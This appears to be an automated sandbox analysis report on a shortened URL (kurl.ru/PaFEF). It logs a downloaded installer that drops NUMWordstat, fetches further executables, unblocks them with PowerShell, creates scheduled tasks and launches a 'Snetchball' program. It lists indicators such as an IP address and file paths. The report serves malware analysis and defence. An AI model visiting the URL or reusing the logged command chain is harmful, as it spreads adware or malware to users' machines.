hxxps://kurl[.]ru/PaFEF

Analysis

max time kernel
83s
max time network
302s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
12/12/2023, 15:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://kurl.ru/PaFEF

Score

8^/10

discovery

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1796	cfg_FjL4Gz7O6U.tmp
1968	numWordstat.exe

Loads dropped DLL 5 IoCs

pid	Process
1544	cfg_FjL4Gz7O6U.exe
1796	cfg_FjL4Gz7O6U.tmp
1796	cfg_FjL4Gz7O6U.tmp
1796	cfg_FjL4Gz7O6U.tmp
1796	cfg_FjL4Gz7O6U.tmp

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.89.198.214

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 40 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\NUMWordstat\is-DBCPN.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-GEHBG.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-D5G3J.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-KSAQQ.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-FAHIQ.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-AKSI4.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-URMPM.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-RNC02.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-6T7C7.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-FBQQG.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\Language\is-UD0EK.tmp	cfg_FjL4Gz7O6U.tmp
File opened for modification	C:\Program Files (x86)\NUMWordstat\unins000.dat	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-NUV7M.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-MDD7J.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\CtrlIcons\is-OMDIQ.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-LDK96.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\unins000.dat	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-058MN.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-KIESV.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-6K8NR.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-MOAMR.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-VCIVR.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-7OPAG.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-AU2OB.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-1DFSN.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-GNA2O.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\Language\is-FMP8P.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-C156T.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-HT1JP.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-BU9DK.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-D86C8.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-IGLHF.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-3VHON.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-GS6G4.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-FGG98.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-I9FUV.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-7RK1O.tmp	cfg_FjL4Gz7O6U.tmp
File opened for modification	C:\Program Files (x86)\NUMWordstat\numWordstat.exe	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-O78TF.tmp	cfg_FjL4Gz7O6U.tmp
File created	C:\Program Files (x86)\NUMWordstat\is-V3TFR.tmp	cfg_FjL4Gz7O6U.tmp

NSIS installer 14 IoCs

installer

resource	yara_rule
behavioral1/files/0x0006000000019c4b-500.dat	nsis_installer_1
behavioral1/files/0x0006000000019c4b-500.dat	nsis_installer_2
behavioral1/files/0x0006000000019c4b-503.dat	nsis_installer_1
behavioral1/files/0x0006000000019c4b-503.dat	nsis_installer_2
behavioral1/files/0x0006000000019c4b-505.dat	nsis_installer_1
behavioral1/files/0x0006000000019c4b-505.dat	nsis_installer_2
behavioral1/files/0x000500000001a0c5-864.dat	nsis_installer_1
behavioral1/files/0x000500000001a0c5-864.dat	nsis_installer_2
behavioral1/files/0x000500000001a0c5-868.dat	nsis_installer_1
behavioral1/files/0x000500000001a0c5-868.dat	nsis_installer_2
behavioral1/files/0x000500000001a0c5-867.dat	nsis_installer_1
behavioral1/files/0x000500000001a0c5-867.dat	nsis_installer_2
behavioral1/files/0x000400000001ceba-978.dat	nsis_installer_1
behavioral1/files/0x000400000001ceba-978.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2332	schtasks.exe
2528	schtasks.exe
1812	schtasks.exe
2536	schtasks.exe
3732	schtasks.exe
3160	schtasks.exe
2808	schtasks.exe
2200	schtasks.exe
3828	schtasks.exe
4024	schtasks.exe
2948	schtasks.exe
1448	schtasks.exe
2764	schtasks.exe
1972	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe
Token: SeShutdownPrivilege	2196	chrome.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
1796	cfg_FjL4Gz7O6U.tmp

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe
2196	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2196 wrote to memory of 2020	2196	chrome.exe	28
PID 2196 wrote to memory of 2020	2196	chrome.exe	28
PID 2196 wrote to memory of 2020	2196	chrome.exe	28
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2084	2196	chrome.exe	30
PID 2196 wrote to memory of 2712	2196	chrome.exe	32
PID 2196 wrote to memory of 2712	2196	chrome.exe	32
PID 2196 wrote to memory of 2712	2196	chrome.exe	32
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31
PID 2196 wrote to memory of 2888	2196	chrome.exe	31

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://kurl.ru/PaFEF
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6fb9758,0x7fef6fb9768,0x7fef6fb9778
  2⤵
  PID:2020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1124 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:2
  2⤵
  PID:2084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:8
  2⤵
  PID:2888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:8
  2⤵
  PID:2712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2268 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:1
  2⤵
  PID:2584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2280 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:1
  2⤵
  PID:3004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1424 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:2
  2⤵
  PID:2476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3300 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:1
  2⤵
  PID:2396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:8
  2⤵
  PID:1796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3664 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3644 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:8
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3636 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:8
  2⤵
  PID:2568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2768 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:1
  2⤵
  PID:400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:8
  2⤵
  PID:2964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3848 --field-trial-handle=1404,i,1983456087590356781,15825618207484951629,131072 /prefetch:8
  2⤵
  PID:1604

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2604

C:\Users\Admin\AppData\Local\Temp\Temp1_cfg_FjL4Gz7O6U.zip\cfg_FjL4Gz7O6U.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_cfg_FjL4Gz7O6U.zip\cfg_FjL4Gz7O6U.exe"
1⤵
- Loads dropped DLL
PID:1544
- C:\Users\Admin\AppData\Local\Temp\is-BIVGN.tmp\cfg_FjL4Gz7O6U.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-BIVGN.tmp\cfg_FjL4Gz7O6U.tmp" /SL5="$201FA,5157355,54272,C:\Users\Admin\AppData\Local\Temp\Temp1_cfg_FjL4Gz7O6U.zip\cfg_FjL4Gz7O6U.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of FindShellTrayWindow
  PID:1796
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Delete /F /TN "NUMWS12122"
    3⤵
    PID:2612
- - C:\Program Files (x86)\NUMWordstat\numWordstat.exe
    "C:\Program Files (x86)\NUMWordstat\numWordstat.exe"
    3⤵
    - Executes dropped EXE
    PID:1968
- - C:\Program Files (x86)\NUMWordstat\numWordstat.exe
    "C:\Program Files (x86)\NUMWordstat\numWordstat.exe" f0561fa19ff71ade3c45eedc247668dd
    3⤵
    PID:876
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\jKQGazGe\vdGB6TAvm2OSm7UU6gU.exe"
      4⤵
      PID:2308
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\jKQGazGe\vdGB6TAvm2OSm7UU6gU.exe"
        5⤵
        
        PID:2400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L8rKBB1R\FSUPySqo7.exe"
      4⤵
      PID:2032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L8rKBB1R\FSUPySqo7.exe"
        5⤵
        
        PID:1612
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\AKdUvsLq\usekemJb54k8uGam.exe"
      4⤵
      PID:1328
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\AKdUvsLq\usekemJb54k8uGam.exe"
        5⤵
        
        PID:1964
  - - C:\Users\Admin\AppData\Local\Temp\jKQGazGe\vdGB6TAvm2OSm7UU6gU.exe
      C:\Users\Admin\AppData\Local\Temp\jKQGazGe\vdGB6TAvm2OSm7UU6gU.exe
      4⤵
      PID:2068
    - - C:\Users\Admin\AppData\Local\Temp\is-2VPRT.tmp\vdGB6TAvm2OSm7UU6gU.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2VPRT.tmp\vdGB6TAvm2OSm7UU6gU.tmp" /SL5="$2031A,7077392,121856,C:\Users\Admin\AppData\Local\Temp\jKQGazGe\vdGB6TAvm2OSm7UU6gU.exe"
        5⤵
        
        PID:1712
      - C:\Program Files (x86)\numGIF\numgif.exe
        
        "C:\Program Files (x86)\numGIF\numgif.exe" -i
        6⤵
        
        PID:2252
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Query
        6⤵
        
        PID:912
      - C:\Program Files (x86)\numGIF\numgif.exe
        
        "C:\Program Files (x86)\numGIF\numgif.exe" -s
        6⤵
        
        PID:1536
      - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" helpmsg 12
        6⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 12
        7⤵
        
        PID:2972
  - - C:\Users\Admin\AppData\Local\Temp\AKdUvsLq\usekemJb54k8uGam.exe
      C:\Users\Admin\AppData\Local\Temp\AKdUvsLq\usekemJb54k8uGam.exe /sid=3 /pid=449
      4⤵
      PID:1868
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        5⤵
        
        PID:3024
      - C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        6⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2192,1005799696380133459,2650119425043446505,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11; Mobile; rv:120.0) Gecko/120.0 Firefox/120.0" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2224 /prefetch:2
        7⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
